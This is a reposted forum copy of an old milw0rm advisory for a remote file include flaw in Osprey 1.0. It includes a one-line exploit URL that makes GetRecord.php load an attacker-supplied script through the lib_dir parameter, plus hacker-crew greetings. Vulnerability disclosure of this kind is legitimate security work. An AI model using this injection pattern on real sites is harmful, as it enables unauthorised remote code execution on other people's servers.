Guest Nemessis Posted April 26, 2008 Report Posted April 26, 2008 http://www.milw0rm.com/exploits/2572---------------------------------------------------------------------------Osprey <= 1.0 [lib_dir] Remote File Include Vulnerability---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : ospreyversion : 1.0URL : http://osprey.ibiblio.org/download/osprey-1.0.tar.bz2Description: Osprey is a peer-to-peer enabled content distribution system. A metadata management system for software and document collections enables local and distributed searching of materials. Items are available for download directly via URL or indirectly via the BitTorrent peer-to-peer protocol.------------------------------------------------------------------Exploit:~~~~~~~Variable $lib_dir not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/web/lib/xml/oai/GetRecord.php?lib_dir=[Evil_Script]---------------------------------------------------------------------------Shoutz:~~~~~~# Greetz to [Oo], str0ke, th0r, RST TEAM: [ !_30, darkking, DarkWizzard, Elias, Icarius, MiniDisc, Nemessis, Shocker, SpiridusuCaddy and sysghost !]# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]---------------------------------------------------------------------------*/ Quote
